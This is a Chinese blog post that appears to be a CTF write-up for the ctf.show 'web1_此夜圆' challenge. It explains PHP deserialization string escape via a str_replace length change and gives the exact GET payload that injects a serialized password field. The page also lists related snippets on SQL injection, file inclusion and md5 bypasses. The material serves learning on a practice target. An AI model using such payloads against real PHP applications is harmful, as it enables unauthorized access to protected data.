CTF.show:web1_此夜圆

最新推荐文章于 2024-02-26 22:42:12 发布
最新推荐文章于 2024-02-26 22:42:12 发布
阅读量533 收藏 1
点赞数 1
分类专栏: CTF.show CTF_Web_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46230755/article/details/113666308
版权

先看一下源码

<?php
error_reporting(0);

class a
{
	public $uname;
	public $password;
	public function __construct($uname,$password)
	{
		$this->uname=$uname;
		$this->password=$password;
	}
	public function __wakeup()
	{
			if($this->password==='yu22x')
			{
				include('flag.php');
				echo $flag;	
			}
			else
			{
				echo 'wrong password';
			}
		}
	}

function filter($string){
    return str_replace('Firebasky','Firebaskyup',$string);
}

$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>

看题目是构造一个反序列化逃逸。
因为str_replace('Firebasky','Firebaskyup',$string);的存在,传入Firebasky后会多两个字符。

在这里插入图片描述
因为我们要逃逸的是这串字符s:8:"password";s:5:"yu22x";}
因为我们只能读入一个uname,而原来的password默认为1,试着构造
在这里插入图片描述

O:1:"a":2:{s:5:"uname";s:39:"Firebasky";s:8:"password";s:5:"yu22x";}";s:8:"password";i:1;}

我们这句话里,要覆盖掉原来的password,需要";s:8:"password";s:5:"yu22x";}利用这句话,一共有30位,而每个str_replace多两位,所以一共需要用15个Firebasky来构造逃逸。因此,构造payload

?1=FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}

得到flag
在这里插入图片描述

FW_ENJOEY
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web1_此夜
qq_43774856的博客
11-30 266
Web1_此夜 下载附件,得到源码 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup() { if($this->pass
ctf.rip:CTF.RIP Jekyll静态网站
04-04
此存储库包含ctf.rip网站的Jekyll源,该源通过构建Jekyll站点,然后将生成的_site/路径部署到_site/进行部署。 生产网址: : 要添加帖子: 将新的markdown文件添加到_posts/ 用jekyll build 部署: 切换到_...
CTFshow web入门 web1
weixin_45990644的博客
07-06 240
CTFshow web入门 web1 这道题目比较简单,题目中有提到 “开发注释未及时删除” 点击连接后页面如下:按F12加入开发者模式查找注释(题目有提到),即可得到flag: 补充: 1.做题多看题目。 2.按F12是进加入开发者界面,主要功能简单来说可以帮助开发者调试js和根据页面元素快速定位,确认请求相应时间和相应内容等,根据内容进行程序调优用。 参考来源: https://www.bilibili.com/video/BV14y4y1J7Yb https://zhidao.baidu.com/qu
ctf.show web web1-web10
qq_61993117的博客
09-17 1806
记录一些web的知识点,本人刚开始学习web很多资料都是借鉴大佬的,许多复现的过程都是大同小异的,写的菜了请大佬们下手轻点。
CTFShow:萌新web1
weixin_64089259的博客
04-14 908
第一次做web1题目,刚开始一脸懵逼,看了大佬的一些博客,才做出来,心里非常激动!
web1_此夜---PHP反序列化字符逃逸
最新发布
sinat_61654365的博客
02-26 398
这里get传入参数1,且需要password=yu22x,那么反序列化前就会执行魔法__wakeup函数,从而得到flag.php。思路:我们控制了unane的内容可以就可以;}”提前闭合了序列化,实现构造恶意的序列化。uname长度=n(Firebaskyup长度-2)+恶意序列化长度。可见以及利用溢出将而已序列化插入其中并且提前闭合了序列化。解析来一段代码带你理解什么是php反序列化字符串逃逸,内容为9个字符串但是为11个逃逸两个字符串。考察我们的是php反序列化字符串逃逸,恶意序列化长度/2=n。
ctf.lib:somectf文件
04-09
标题中的“ctf.lib:somectf文件”可能指的是某个CTF赛事中使用的库或者工具,具体到这个例子中,可能是参赛者或者组织者用于比赛的一份资源库,名为“ctf.lib”,其中包含了某个特定的CTF挑战,可能是安全漏洞的模拟...
CTF.rar_ctf_seed7rj
09-21
【标题】"CTF.rar_ctf_seed7rj" 暗示了这是一个与网络安全相关的挑战,CTF(Capture The Flag)是网络安全领域常见的比赛形式,通常涉及逆向工程、密码学、网络攻防等技能。"seed7rj"可能是这次挑战的一个特定标识...
CTF_Web_docker:CTF_Web的码头工人
05-14
CTF_Web_dockerCTF中Web和Bin最大的区别在于,一旦比赛结束,Web选手就抓瞎了,没办法复现EXP。因此,打算收集整理一些自己做的Web题环境,方便复现。Enjoy it.
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
在"CTF-AWD-WEB"中,重点在于Web安全领域,涵盖了各种Web应用漏洞和防护技巧。 本资源"CTF-AWD-WEB"是一个包含了多个AWD模式下Web试题的仓库,这些试题可能来源于不同的CTF线下赛事。通过这些试题,学习者可以深入...
ctf.show web1-20
m0_45155797的博客
04-07 79
源码泄露前台js绕过协议头信息泄露robots后台泄露phps源码泄露源码压缩包泄露版本控制源码泄露——.git版本控制源码泄露——SVNvim临时文件泄露cookie泄露域名txt记录泄露敏感信息泄露内部技术文档泄露编辑器配置不当密码逻辑漏洞探针泄露备份数据库泄露js敏感信息泄露前端密钥泄露数据库泄露‍‍。
ctfshow-WEB-web1签到题
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块的第一关,这一关的flag藏在注释中,由于开发人员的粗心,没有及时删除开发过程中的代码注释,从而留下了敏感信息 页面中只有一句 where is flag?,我们按F12(或者Fn+F12)进入开发者模式,查看页面的源码 Ctrl+c将源码中的注释复制下来,很明显是加密后的内容,需要进行解密,从而获取flag <!-- Y3Rmc2hvd3sxNTA5MDI4My03ZWM3LTQ0ZTQtOWJmNS03YWIwMzllNDU4OTN9...
ctfshow-萌新-web1( 利用intval函数的特性获取敏感数据)
wangyuxiang946的博客
09-08 1万+
ctf.show 萌新模块的web1关, 这一关考察的是intval()函数转换字符串时的特性以及SQL的拼接绕过 这一关直接就给了源码, 并提示我们 id = 1000 时, 就是flag 先分析一下源码, 首先是 intval()函数将参数id转换为数值型, id > 999直接die()结束程序, 也就是说我们传递的id不能大于 999, 明知道1000就是flag, 但不能直接传1000, 否则程序会直接die()结束, 传递的id 即不能大于999, 又需要查询 1...
学习笔记(ctfshow WEB
qq_51301115的博客
05-02 194
web签到题 查看源码 将源码中的字符串使用base64解码 得到flag
CTF show WEB 1-4
羽的博客
02-15 6968
1.web签到题 直接源代码查看 2.web2 直接尝试万能密码,登陆成功 order by查找回显数 在3时正常回显,4是无回显,说明回显数为3 使用union select 联合查询爆库名 爆表名 爆字段 爆flag值 ...
ctfshow web1-10
m0_50237943的博客
01-31 1855
CTFSHOW WEB(1-10) web1 签到题 F12,在注释里得到一串字符串,base64解码可得flag web2 最简单的sql注入 直接sqlmap一把梭 web3 考点是文件包含和PHP伪协议,可以利用php://input协议,在POST正文中写下PHP代码,被包含进去执行: 可以看到flag在ctf_go_go_go这个目录下,接着在cat一下就出flag了 web4 web4和web3类似,但是过滤了一堆php的伪协议,这时候想到可能是包含本地的什么文件,最后知道了是包含日志文件
ctfshow web篇月饼杯
读书 买花 长大
01-05 304
月饼杯
ctfshow_月饼杯
qq_44657899的博客
07-01 457
文章目录0x010x03 web3_莫负婵娟 (LIKE盲注、$PATH环境变量截取字母) 0x01 0x03 web3_莫负婵娟 (LIKE盲注、$PATH环境变量截取字母) 在登录页面的源代码中可以看到一些提示 用户名为yu22x,查询语句为like,可以使用通配符%和_。 百分比(%)通配符允许匹配任何字符串的零个或多个字符。下划线_通配符允许匹配任何单个字符。 fuzz了一下,被过滤的有这些字符,%号被过滤了,我们可以使用_ 写个脚本测试一下密码长度 import requests heade
ctfshow月饼杯 web_wp
西部壮仔的博客
11-11 395
web1_此夜 ​ 题目如下 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup() { if($this->passwo
ctf.show_web5
10-22
ctf.show_web5是一个CTF比赛中的WEB模块第5关,需要传递两个参数v1和v2,要求v1必须是纯字母字符串,v2必须是数字或数字字符串,并且两个参数的md5值必须相等。可以利用md5的0e漏洞进行绕过。具体来说,可以构造一个字符串,使得它的md5值以0e开头,然后将这个字符串作为v1和v2的值传递即可。在PHP中,当字符串以0e开头并且后面跟着一串数字时,PHP会将这个字符串解析成科学计数法的形式,因此可以绕过is_numeric()函数的检测。而ctype_alpha()函数只检测字符串中是否仅包含字母,不会对字符串进行其他处理,因此不会受到0e漏洞的影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值